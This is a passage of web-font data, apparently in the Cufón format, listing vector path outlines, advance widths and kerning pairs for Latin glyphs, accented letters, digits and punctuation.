-181v3,-8,29,-8,32,0r0,176v0,9,-32,10,-32,0r0,-176","w":91,"k":{"\u00fe":-2,"l":-2,"k":-2,"h":-2,"b":-2}},{"d":"141,-180v3,-11,38,-12,32,5r-86,240v-4,6,-31,10,-36,1v6,-23,17,-44,25,-66v-28,-56,-48,-119,-69,-181v2,-10,32,-7,35,2r51,141","w":181,"k":{"-":9,".":26,",":29,"z":3,"\u00ff":-2,"\u00fd":-2,"y":-2,"w":-2,"v":-2,"t":-2,"s":4,"q":5,"\u00f8":5,"\u00f6":5,"\u00f5":5,"\u00f4":5,"\u00f3":5,"\u00f2":5,"o":5,"g":5,"f":-2,"\u00eb":5,"\u00ea":5,"\u00e9":5,"\u00e8":5,"e":5,"d":5,"\u00e7":5,"c":5,"\u00e6":6,"\u00e5":6,"\u00e4":6,"\u00e3":6,"\u00e2":6,"\u00e1":6,"\u00e0":6,"a":6}},{"d":"19,-125v-3,-95,66,-151,158,-124r23,-46v9,-2,36,-5,29,8r-25,50v28,22,40,59,42,108v4,97,-65,152,-158,126v-11,19,-20,64,-53,42r27,-55v-30,-20,-41,-59,-43,-109xm101,-31v100,41,141,-100,87,-175xm164,-222v-99,-41,-142,101,-86,175","w":265},{"d":"107,-189v59,0,86,35,86,94v0,61,-30,99,-89,99v-58,0,-87,-35,-86,-95v0,-61,29,-97,89,-98xm105,-23v38,0,54,-29,54,-70v1,-41,-13,-69,-53,-69v-41,0,-55,30,-55,69v0,40,14,70,54,70xm71,-256v15,0,17,5,18,18v1,14,-4,19,-18,19v-15,0,-18,-4,-18,-18v0,-14,4,-19,18,-19xm140,-256v15,0,18,4,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19","w":210,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"d":"151,-135v30,7,48,27,49,63v0,75,-76,74,-154,72v-7,0,-13,-5,-12,-14r0,-225v2,-26,46,-14,70,-14v49,0,79,17,80,64v0,28,-14,45,-33,54xm67,-144v45,3,83,0,83,-42v0,-41,-40,-41,-83,-39r0,81xm67,-28v49,1,98,5,98,-43v0,-48,-48,-48,-98,-46r0,89","w":217,"k":{",":5,"\u00ff":4,"\u00fd":4,"y":4,"x":3,"v":4,"t":4,"f":4,"Z":4,"\u00dd":11,"Y":11,"X":9,"W":5,"V":5,"T":9,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"131,-27v33,3,51,-26,70,-21v8,39,-30,44,-62,51v17,25,18,72,-26,68v-19,4,-45,-9,-27,-24v21,2,47,0,33,-25r-9,-20v-61,-8,-92,-54,-91,-125v1,-79,35,-133,111,-133v34,0,74,6,71,46v0,4,-2,8,-6,8v-18,-9,-35,-26,-65,-25v-54,2,-75,46,-75,102v0,57,20,93,76,98","w":213,"k":{",":2,"T":-2,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-2,"G":4,"\u00c6":-4}},{"d":"104,-256v71,0,86,56,85,129v-1,72,-19,131,-90,131v-70,0,-86,-56,-85,-130v2,-72,18,-130,90,-130xm101,-24v49,0,53,-51,53,-101v-1,-52,-2,-104,-52,-104v-49,0,-54,51,-54,101v0,53,3,104,53,104","w":202},{"d":"247,-232v0,-23,61,-33,61,-6r0,233v1,9,-20,6,-29,5v-1,0,-3,-3,-3,-5r-1,-220r-90,221v-3,8,-28,8,-32,0r-87,-221r0,220v-1,10,-25,7,-32,3r0,-236v3,-26,62,-18,63,6r74,183","w":341},{"d":"159,-248v5,-11,48,-8,33,7r-66,112r72,124v-1,11,-36,8,-38,0r-57,-100v-21,34,-38,73,-62,105v-13,0,-39,6,-28,-12r69,-116r-69,-120v0,-11,27,-6,36,-3r56,98","w":207,"k":{"-":16,"\u00ff":8,"\u00fd":8,"y":8,"w":10,"v":11,"u":7,"t":6,"q":9,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"g":2,"\u00eb":8,"\u00ea":8,"\u00e9":8,"\u00e8":8,"e":8,"d":9,"S":4,"Q":11,"\u00d6":11,"\u00d5":11,"\u00d4":11,"\u00d3":11,"\u00d2":11,"O":11,"G":13,"\u00c7":11,"C":11}},{"d":"98,38v13,-2,17,4,15,18v-1,7,-10,7,-18,7v-54,2,-43,-59,-43,-111v0,-33,-12,-46,-34,-54v0,-8,-4,-19,5,-20v66,-10,-17,-176,86,-151v8,5,5,29,-10,23v-27,2,-16,45,-18,76v-2,34,-8,58,-35,64v40,6,34,55,35,101v0,23,-3,45,17,47","w":125},{"d":"68,39v14,3,40,-9,37,12v0,6,0,11,-5,11v-22,-4,-63,11,-63,-13r0,-309v1,-24,42,-9,65,-13v5,3,5,24,-2,24r-32,0r0,288","w":122},{"d":"27,-165v20,-32,112,-34,125,5v11,-19,33,-29,62,-29v54,0,77,34,76,89v1,9,-6,13,-12,14r-116,0v-8,72,73,69,118,51v5,2,3,17,1,22v-33,26,-119,23,-135,-16v-24,42,-131,49,-128,-21v1,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20xm258,-110v9,-59,-78,-73,-92,-21v-2,7,-4,14,-4,21r96,0xm51,-51v3,47,68,29,83,-1v-2,-8,-5,-23,-4,-33v-38,0,-81,-3,-79,34","w":309,"k":{"z":4,"\u00ff":3,"\u00fd":3,"y":3,"x":6,"w":2,"v":2,"t":2,"f":4}},{"d":"107,-189v59,0,86,35,86,94v0,61,-30,99,-89,99v-58,0,-87,-35,-86,-95v0,-61,29,-97,89,-98xm105,-23v38,0,54,-29,54,-70v1,-41,-13,-69,-53,-69v-41,0,-55,30,-55,69v0,40,14,70,54,70xm120,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","w":210,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"d":"117,-339v24,0,40,13,40,36v0,23,-15,38,-41,37v-25,0,-39,-12,-39,-36v0,-24,16,-37,40,-37xm117,-283v11,-1,17,-8,18,-19v0,-11,-6,-20,-18,-19v-12,0,-18,6,-18,18v0,12,5,20,18,20xm41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"172,-28v10,0,11,27,0,28r-149,0v-19,0,-11,-35,-3,-42r117,-183r-116,0v-8,0,-11,-28,0,-28r141,0v19,0,11,35,3,43r-116,182r123,0","w":187,"k":{"-":9,"\u00ff":7,"\u00fd":7,"y":7,"w":7,"v":9,"q":4,"\u00f8":6,"\u00f6":6,"\u00f5":6,"\u00f4":6,"\u00f3":6,"\u00f2":6,"o":6,"\u00ef":-11,"\u00ee":-8,"\u00ec":-3,"\u00eb":6,"\u00ea":6,"\u00e9":6,"\u00e8":6,"e":6,"d":4,"\u00e7":2,"c":2,"\u00e6":2,"\u00e5":2,"\u00e4":2,"\u00e3":2,"\u00e2":2,"\u00e1":2,"\u00e0":2,"a":2,"\u00dd":1,"Y":1,"W":1,"Q":5,"\u00d6":5,"\u00d5":5,"\u00d4":5,"\u00d3":5,"\u00d2":5,"O":5,"G":5,"\u00c7":5,"C":5,"\u00c5":2,"\u00c4":2,"\u00c3":2,"\u00c2":2,"\u00c1":2,"\u00c0":2,"A":2}},{"d":"152,-181v2,-8,26,-9,28,0r0,246v1,9,-15,5,-24,6v-5,0,-7,-2,-8,-6r0,-90v-15,15,-31,29,-58,29v-53,0,-71,-42,-71,-95v0,-56,19,-98,76,-98v29,-1,41,16,57,30r0,-22xm96,-24v27,0,39,-18,52,-34r0,-71v-15,-17,-26,-33,-51,-33v-61,0,-62,138,-1,138","w":210,"k":{"g":-2}},{"d":"30,-266v2,-10,32,-9,32,0r0,261v0,9,-32,10,-32,0r0,-261","w":91},{"d":"62,-153v64,-6,117,10,117,72v0,82,-100,104,-157,68v-2,-7,-5,-24,3,-27v37,24,119,25,119,-38v0,-51,-52,-52,-101,-47v-8,1,-10,-3,-10,-12r0,-103v0,-8,3,-13,11,-13r115,1v7,5,7,29,-3,29r-94,0r0,70","w":202},{"d":"30,-181v3,-8,29,-8,32,0r0,176v0,9,-32,10,-32,0r0,-176xm57,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","w":91},{"d":"77,-274v1,-10,25,-7,30,-3r0,345v-5,4,-29,7,-30,-3r0,-339","w":184},{"d":"62,-161v36,-48,119,-32,119,49r0,107v0,9,-31,10,-32,0v-7,-59,22,-157,-37,-157v-23,0,-35,18,-50,34r0,123v0,9,-32,10,-32,0r1,-264v4,-4,31,-7,31,3r0,105","w":210,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"230,-189v83,-1,61,107,61,184v0,9,-32,10,-33,0v-8,-57,22,-151,-35,-157v-22,2,-32,18,-47,34r0,123v1,9,-15,5,-24,6v-5,0,-7,-2,-8,-6v-7,-57,22,-151,-35,-157v-21,2,-33,18,-47,34r0,123v0,9,-32,10,-32,0r0,-178v6,-5,27,-6,29,2r0,24v17,-18,29,-31,57,-32v30,-1,45,14,54,34v18,-16,29,-34,60,-34","w":319,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"30,-233v15,-38,110,-28,101,25v-4,27,4,62,-2,85v-12,3,-28,3,-23,-14v-19,27,-85,24,-83,-21v2,-38,37,-43,79,-41v9,-44,-45,-36,-65,-21v-5,-1,-7,-6,-7,-13xm126,-92v6,1,7,5,7,13v0,7,-2,12,-7,12r-97,0v-10,0,-9,-25,0,-25r97,0xm85,-180v-34,-9,-44,39,-12,39v22,0,33,-13,29,-39r-17,0","w":160},{"d":"32,-227v-9,-1,-9,-26,0,-26v31,2,70,-3,98,3v4,5,3,23,-4,23r-94,0","w":157},{"d":"155,-86v16,1,39,-6,36,14v2,20,-20,13,-36,14r0,53v-1,10,-25,7,-32,3r0,-56r-109,-1v-8,-6,-5,-27,0,-35r94,-157v11,-4,41,-6,47,4r0,161xm123,-86r-1,-138r-82,138r83,0","w":202},{"d":"60,-132v-1,75,33,113,108,113v76,0,104,-45,105,-119v1,-76,-34,-113,-108,-113v-74,1,-104,44,-105,119xm167,-273v90,0,132,46,133,133v0,93,-43,144,-134,144v-87,0,-133,-45,-132,-134v1,-91,40,-143,133,-143xm172,-73v23,2,34,-24,48,-17v7,33,-23,42,-51,42v-51,0,-67,-34,-72,-85v-8,-76,80,-115,123,-66v0,8,3,20,-4,20v-16,-4,-23,-19,-45,-18v-32,1,-44,27,-44,62v0,36,11,59,45,62","w":333},{"d":"30,-181v3,-8,29,-8,32,0r0,176v0,9,-32,10,-32,0r0,-176xm46,-259v16,0,20,4,20,19v0,16,-4,19,-20,19v-16,0,-20,-4,-20,-19v0,-16,4,-19,20,-19","w":91},{"d":"41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"129,-279v-4,7,-26,11,-31,2r48,-52v11,-1,36,-4,27,9xm41,-6v-3,13,-46,10,-32,-6r86,-238v7,-7,39,-7,43,3r87,242v-1,10,-34,8,-36,0r-22,-61r-105,0xm114,-219r-44,126r88,0","w":231,"k":{"-":3,".":-2,",":-3,"?":13,"\u00ff":8,"\u00fd":8,"y":8,"v":7,"t":10,"\u00dd":29,"Y":29,"W":16,"V":17,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"T":31,"Q":4,"\u00d6":4,"\u00d5":4,"\u00d4":4,"\u00d3":4,"\u00d2":4,"O":4,"J":-4,"G":3,"\u00c7":3,"C":3}},{"d":"103,-189v55,0,77,35,77,89v1,9,-7,14,-13,14r-115,0v-8,68,70,74,115,50v7,0,5,16,4,23v-13,12,-40,17,-65,17v-61,0,-88,-35,-88,-96v0,-58,27,-96,85,-97xm147,-110v11,-60,-77,-73,-91,-21v-2,7,-4,14,-4,21r95,0xm114,-219v-3,7,-26,9,-28,1v18,-20,19,-61,59,-55v5,0,8,5,4,8","k":{"z":4,"\u00ff":3,"\u00fd":3,"y":3,"x":6,"w":2,"v":2,"t":2,"f":4}},{"d":"218,-129v40,-1,53,27,54,65v0,40,-17,67,-55,67v-39,0,-54,-26,-54,-66v1,-40,16,-65,55,-66xm218,-19v24,0,27,-21,27,-44v0,-23,-4,-45,-28,-45v-22,0,-26,20,-26,44v-1,26,3,45,27,45xm69,-256v39,0,54,27,54,66v0,40,-17,67,-55,67v-39,0,-54,-26,-54,-66v0,-40,15,-67,55,-67xm69,-145v24,0,27,-21,27,-44v0,-23,-4,-45,-28,-45v-22,0,-26,19,-26,43v-1,27,3,46,27,46xm217,-255v5,-8,36,-9,27,5r-182,256v-9,2,-29,2,-21,-9","w":285},{"d":"99,-277v9,0,14,0,14,7r-5,51v16,-9,28,-25,47,-30v3,3,18,20,9,25r-47,20r47,21v8,6,-5,28,-14,26r-42,-31r5,51v0,7,-5,6,-14,7v-30,1,-6,-39,-9,-58v-16,9,-28,26,-47,31v-3,-4,-18,-21,-9,-26r47,-21r-47,-20v-8,-5,5,-27,14,-25r42,30r-6,-51v1,-6,6,-7,15,-7"},{"d":"158,-29v10,1,10,29,0,29r-112,0v-7,0,-13,-5,-12,-14r0,-234v1,-8,30,-8,33,0r0,219r91,0","w":168,"k":{"\u00b7":11,",":-3,"\u00ff":15,"\u00fd":15,"y":15,"w":14,"v":15,"t":7,"f":4,"\u00dd":33,"Y":33,"W":23,"V":29,"\u00dc":9,"\u00db":9,"\u00da":9,"\u00d9":9,"U":9,"T":29,"Q":9,"\u00d6":9,"\u00d5":9,"\u00d4":9,"\u00d3":9,"\u00d2":9,"O":9,"J":-5,"G":9,"\u00c7":4,"C":4,"\u00c6":-12}},{"d":"27,-267v4,-8,30,-9,34,0r-5,94v-2,4,-25,7,-24,-3","w":88},{"d":"39,-324v38,-22,59,29,78,47v-5,9,-27,5,-31,-2xm167,-28v10,0,10,27,0,28r-121,0v-7,0,-13,-5,-12,-14r0,-225v-1,-9,5,-14,12,-14r120,0v10,2,10,28,0,28r-99,0r0,79r85,0v10,2,10,27,0,28r-85,0r0,90r100,0","w":195,"k":{"-":5,"\u00ff":9,"\u00fd":9,"y":9,"w":7,"v":9,"t":5,"q":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"f":12,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":5,"c":5,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"Z":2,"S":4,"Q":6,"\u00d6":6,"\u00d5":6,"\u00d4":6,"\u00d3":6,"\u00d2":6,"O":6,"G":5,"\u00c7":5,"C":5,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"51,-139v11,47,90,27,89,86v-1,40,-29,56,-69,57v-29,1,-70,-13,-50,-43v22,20,102,29,84,-24v-26,-27,-82,-21,-85,-74v-3,-53,80,-67,110,-36v0,0,4,20,-4,22v-18,-13,-75,-25,-75,12","w":156,"k":{"z":4,"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":2,"v":6,"t":4,"f":4}},{"d":"55,-263v6,-8,36,-9,35,4r-4,189v-3,5,-28,6,-28,-3xm72,-43v16,0,21,7,21,23v0,15,-6,22,-21,22v-15,0,-20,-7,-20,-22v0,-15,4,-23,20,-23","w":130},{"d":"98,37v-85,9,-107,-113,-40,-142v8,-4,17,-5,27,-6v3,-23,-12,-63,28,-52v7,14,2,40,4,59v1,12,-6,16,-18,15v-31,-0,-47,17,-47,49v0,58,70,58,101,35v8,1,6,15,5,22v-10,15,-35,17,-60,20xm100,-188v-16,-0,-20,-8,-20,-23v0,-15,5,-22,20,-22v15,-0,21,7,21,22v0,16,-5,23,-21,23","w":185,"k":{"\u00ff":13,"\u00fd":13,"y":13,"w":14,"v":13,"j":-4,"f":9,"\u00dd":22,"Y":22,"V":19,"T":20}},{"d":"57,-179v16,0,22,8,21,23v0,15,-6,22,-21,22v-15,0,-22,-7,-20,-22v-2,-15,5,-23,20,-23xm51,-43v29,-8,32,23,21,45v-17,16,-25,63,-58,51v9,-26,26,-42,26,-81v0,-9,3,-13,11,-15","w":107},{"d":"162,-209v-25,-17,-104,-31,-104,18v0,75,158,32,118,148v-10,28,-41,41,-79,43v-3,20,2,61,-30,44r4,-45v-27,-4,-64,-9,-49,-45v37,24,149,30,120,-42v-36,-41,-142,-32,-113,-124v8,-26,35,-38,68,-41r4,-41v3,-4,27,-7,26,3r-4,39v23,4,53,8,43,40v0,2,-3,3,-4,3","w":202},{"d":"148,-265v1,-10,34,-9,32,0r0,263v-4,4,-27,6,-28,-3r0,-23v-16,16,-34,32,-62,32v-53,0,-71,-42,-71,-95v0,-56,19,-98,76,-98v25,1,40,11,53,26r0,-102xm96,-24v27,0,39,-18,52,-34r0,-71v-15,-17,-26,-33,-51,-33v-61,0,-62,138,-1,138","w":210},{"d":"121,-189v53,0,71,41,71,93v0,57,-21,100,-77,100v-26,0,-39,-13,-53,-27r0,88v0,9,-32,10,-32,0r0,-248v5,-5,28,-7,28,2r0,24v17,-15,32,-32,63,-32xm112,-24v61,0,64,-138,2,-138v-26,0,-37,19,-52,35r0,70v15,17,26,33,50,33","w":210,"k":{"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2,"t":2,"s":2,"f":3}},{"d":"107,-189v59,0,86,35,86,94v0,61,-30,99,-89,99v-58,0,-87,-35,-86,-95v0,-61,29,-97,89,-98xm105,-23v38,0,54,-29,54,-70v1,-41,-13,-69,-53,-69v-41,0,-55,30,-55,69v0,40,14,70,54,70","w":210,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"d":"103,-189v55,0,77,35,77,89v1,9,-7,14,-13,14r-115,0v-8,68,70,74,115,50v7,0,5,16,4,23v-13,12,-40,17,-65,17v-61,0,-88,-35,-88,-96v0,-58,27,-96,85,-97xm147,-110v11,-60,-77,-73,-91,-21v-2,7,-4,14,-4,21r95,0xm66,-256v15,0,17,5,18,18v1,14,-4,19,-18,19v-15,0,-18,-4,-18,-18v0,-14,4,-19,18,-19xm135,-256v15,0,18,4,18,18v0,14,-4,19,-18,19v-15,0,-17,-5,-18,-18v-1,-14,4,-19,18,-19","k":{"z":4,"\u00ff":3,"\u00fd":3,"y":3,"x":6,"w":2,"v":2,"t":2,"f":4}},{"d":"124,-239v20,0,4,-29,25,-26v8,1,12,0,12,8v0,48,-54,52,-77,24v-14,-16,-32,-2,-32,18v-9,0,-20,4,-21,-7v-4,-40,44,-55,70,-30v6,5,13,13,23,13xm93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"108,-174v-5,-10,8,-9,19,-9v4,1,8,1,9,5v15,26,33,49,46,77v-14,29,-30,56,-50,80v-9,0,-31,4,-24,-7r42,-73xm35,-171v-4,-7,5,-9,13,-8v5,1,14,0,16,5v15,25,34,46,46,73v-12,28,-32,50,-47,75v-7,2,-34,5,-27,-6r42,-69","w":204},{"d":"103,-189v55,0,77,35,77,89v1,9,-7,14,-13,14r-115,0v-8,68,70,74,115,50v7,0,5,16,4,23v-13,12,-40,17,-65,17v-61,0,-88,-35,-88,-96v0,-58,27,-96,85,-97xm147,-110v11,-60,-77,-73,-91,-21v-2,7,-4,14,-4,21r95,0xm55,-265v-5,-8,3,-9,13,-9v33,0,33,38,50,56v-2,8,-26,6,-28,-1","k":{"z":4,"\u00ff":3,"\u00fd":3,"y":3,"x":6,"w":2,"v":2,"t":2,"f":4}},{"d":"133,-239v21,3,5,-28,26,-26v8,1,11,1,12,8v4,48,-54,52,-78,24v-13,-16,-31,-1,-31,18v0,0,-21,4,-21,-7v0,-25,13,-43,37,-43v26,-1,34,22,55,26xm107,-189v59,0,86,35,86,94v0,61,-30,99,-89,99v-58,0,-87,-35,-86,-95v0,-61,29,-97,89,-98xm105,-23v38,0,54,-29,54,-70v1,-41,-13,-69,-53,-69v-41,0,-55,30,-55,69v0,40,14,70,54,70","w":210,"k":{",":7,"z":5,"\u00ff":2,"\u00fd":2,"y":2,"x":8,"w":2,"v":2}},{"w":90},{"d":"194,-15v10,10,0,19,-13,16v-10,1,-17,-1,-21,-6r-93,-126r0,126v-1,10,-20,6,-30,5v-2,0,-4,-3,-3,-5r0,-243v1,-8,30,-8,33,0r0,113r92,-116v13,-7,44,-5,28,15r-83,101","w":207,"k":{"-":7,"\u00ff":17,"\u00fd":17,"y":17,"w":19,"v":20,"\u00fc":6,"\u00fb":6,"\u00fa":6,"\u00f9":6,"u":6,"t":7,"s":4,"r":6,"q":6,"p":6,"\u00f8":7,"\u00f6":7,"\u00f5":7,"\u00f4":7,"\u00f3":7,"\u00f2":7,"o":7,"\u00f1":6,"n":6,"m":6,"\u00ef":-6,"\u00ee":-7,"\u00ec":-5,"f":5,"\u00eb":7,"\u00ea":7,"\u00e9":7,"\u00e8":7,"e":7,"d":6,"\u00e7":8,"c":8,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7,"W":7,"\u00dc":6,"\u00db":6,"\u00da":6,"\u00d9":6,"U":6,"S":4,"Q":19,"\u00d6":19,"\u00d5":19,"\u00d4":19,"\u00d3":19,"\u00d2":19,"O":19,"G":16,"\u00c7":15,"C":15}},{"d":"93,-189v47,-1,69,19,69,66r0,118v0,9,-13,6,-22,6v-9,0,-4,-15,-5,-23v-27,38,-120,36,-117,-28v2,-54,54,-60,112,-58v2,-34,-6,-55,-40,-55v-24,0,-41,11,-57,18v-8,0,-6,-11,-6,-20v11,-17,38,-24,66,-24xm84,-21v22,0,33,-12,46,-27r0,-37v-38,0,-79,-3,-79,34v0,19,15,30,33,30xm49,-265v-5,-8,3,-9,13,-9v33,0,33,38,50,56v-2,8,-26,6,-28,-1","w":191,"k":{"\u00ff":7,"\u00fd":7,"y":7,"x":4,"w":3,"v":7,"t":4,"f":2}},{"d":"101,-254v-15,14,-22,51,-53,38v12,-22,32,-73,71,-53v11,18,27,34,35,53v-31,13,-39,-24,-53,-38xm103,-189v55,0,77,35,77,89v1,9,-7,14,-13,14r-115,0v-8,68,70,74,115,50v7,0,5,16,4,23v-13,12,-40,17,-65,17v-61,0,-88,-35,-88,-96v0,-58,27,-96,85,-97xm147,-110v11,-60,-77,-73,-91,-21v-2,7,-4,14,-4,21r95,0","k":{"z":4,"\u00ff":3,"\u00fd":3,"y":3,"x":6,"w":2,"v":2,"t":2,"f":4}},{"d":"135,-256v79,0,111,48,110,127v0,81,-36,133,-115,133v-79,0,-111,-49,-111,-129v0,-79,35,-131,116,-131xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":264,"k":{".":6,",":9,"z":2,"x":2,"Z":7,"\u00dd":11,"Y":11,"X":12,"W":4,"V":5,"T":11,"J":5,"\u00c6":6,"\u00c5":4,"\u00c4":4,"\u00c3":4,"\u00c2":4,"\u00c1":4,"\u00c0":4,"A":4}},{"d":"188,-253v7,0,12,5,12,12r-3,285v-8,1,-23,5,-25,-4r0,-268r-39,0r0,268v-3,8,-26,9,-28,0r0,-144v-51,-1,-83,-22,-84,-74v0,-79,83,-79,167,-75","w":234},{"d":"245,-129v0,44,-10,79,-32,101v20,17,37,25,60,36v5,4,6,28,-3,29v-33,-7,-60,-27,-82,-48v-14,8,-35,15,-58,15v-79,-1,-111,-49,-111,-129v0,-79,35,-131,116,-131v78,0,110,49,110,127xm132,-25v58,0,78,-43,78,-102v0,-58,-19,-101,-77,-101v-59,0,-78,43,-78,101v0,60,18,102,77,102","w":269,"k":{"}":-6,"]":-6,")":-6,"\/":-27,";":-12,",":-21,"x":-6,"j":-15,"g":-12,"\u00dd":9,"Y":9,"X":-2,"W":2,"V":5,"T":9,"J":-8,"\u00c6":-14}},{"d":"157,-127v4,55,-60,79,-103,54v-14,10,-8,36,15,35v51,-2,106,-1,106,49v0,44,-37,61,-86,60v-43,0,-79,-9,-79,-47v0,-22,13,-34,26,-44v-26,-10,-21,-53,-2,-67v-37,-48,10,-122,83,-99v20,6,59,-12,60,13v1,19,-17,12,-32,13v8,8,11,19,12,33xm89,-88v24,0,37,-15,37,-38v1,-24,-14,-39,-38,-38v-24,0,-36,15,-36,39v-1,24,14,37,37,37xm42,21v0,39,103,35,101,-8v-2,-32,-49,-23,-80,-26v-10,9,-21,16,-21,34","w":188,"k":{"\/":-14,",":-4,"t":6,"q":4,"\u00f8":3,"\u00f6":3,"\u00f5":3,"\u00f4":3,"\u00f3":3,"\u00f2":3,"o":3,"g":-4,"\u00eb":3,"\u00ea":3,"\u00e9":3,"\u00e8":3,"e":3,"d":4,"\u00e7":2,"c":2,"\u00e6":7,"\u00e5":7,"\u00e4":7,"\u00e3":7,"\u00e2":7,"\u00e1":7,"\u00e0":7,"a":7}},{"d":"153,-247v3,-12,46,-10,33,6r-72,143v-2,32,4,72,-3,98v-11,-1,-29,5,-31,-5r0,-93r-74,-150v0,-11,33,-8,37,1r55,117v17,-41,36,-79,55,-117","w":194,"k":{"-":23,"\/":24,".":46,":":30,";":27,",":49,"z":20,"\u00ff":13,"\u00fd":13,"y":13,"x":14,"w":12,"v":13,"\u00fc":18,"\u00fb":18,"\u00fa":18,"\u00f9":18,"u":18,"t":9,"\u00df":14,"s":22,"r":18,"q":26,"p":18,"\u00f8":30,"\u00f6":30,"\u00f5":30,"\u00f4":30,"\u00f3":30,"\u00f2":30,"o":30,"\u00f1":18,"n":18,"m":18,"j":10,"\u00ef":-10,"\u00ee":-9,"\u00ed":14,"\u00ec":-8,"i":6,"g":28,"f":12,"\u00eb":29,"\u00ea":29,"\u00e9":29,"\u00e8":29,"e":29,"d":26,"\u00e7":31,"c":31,"\u00e6":26,"\u00e5":26,"\u00e4":26,"\u00e3":26,"\u00e2":26,"\u00e1":26,"\u00e0":26,"a":26,"Z":2,"S":3,"Q":13,"\u00d6":13,"\u00d5":13,"\u00d4":13,"\u00d3":13,"\u00d2":13,"O":13,"J":22,"G":13,"\u00c7":13,"C":13,"\u00c6":34,"\u00c5":30,"\u00c4":30,"\u00c3":30,"\u00c2":30,"\u00c1":30,"\u00c0":30,"A":30}},{"d":"47,-253v75,-3,143,2,142,74v-1,66,-49,87,-122,83v-2,31,4,71,-3,96v-10,-1,-30,5,-30,-5r0,-233v-1,-9,6,-14,13,-15xm67,-124v50,4,87,-6,87,-52v0,-46,-39,-52,-87,-49r0,101","w":206,"k":{"-":12,"\/":21,".":51,",":50,"\u00ff":-2,"\u00fd":-2,"y":-2,"t":-2,"s":6,"q":7,"\u00f8":8,"\u00f6":8,"\u00f5":8,"\u00f4":8,"\u00f3":8,"\u00f2":8,"o":8,"f":-2,"\u00eb":8,"\u00ea":8,"\u00e9":8,"\u00e8":8,"e":8,"d":7,"\u00e7":8,"c":8,"\u00e6":9,"\u00e5":9,"\u00e4":9,"\u00e3":9,"\u00e2":9,"\u00e1":9,"\u00e0":9,"a":9,"Z":6,"\u00dd":2,"Y":2,"X":7,"V":2,"T":2,"J":27,"\u00c6":27,"\u00c5":29,"\u00c4":29,"\u00c3":29,"\u00c2":29,"\u00c1":29,"\u00c0":29,"A":29}},{"d":"33,-181v4,-8,29,-8,33,0r0,184v0,42,-11,68,-52,68v-19,5,-27,-10,-20,-28v30,5,39,-8,39,-40r0,-184xm50,-259v16,0,20,5,20,19v0,15,-5,19,-21,19v-15,0,-19,-5,-19,-19v0,-16,4,-19,20,-19","w":95},{"d":"96,-267v4,-8,30,-8,34,0r-5,94v-3,5,-24,6,-24,-3xm27,-267v4,-8,31,-8,34,0r-5,94v-3,4,-23,7,-24,-3","w":160},{"d":"102,-112v10,1,10,27,0,27r-81,0v-7,0,-8,-6,-8,-14v0,-8,2,-12,8,-13r81,0","w":122,"k":{"\u00ff":4,"\u00fd":4,"y":4,"x":7,"v":4,"f":4,"\u00dd"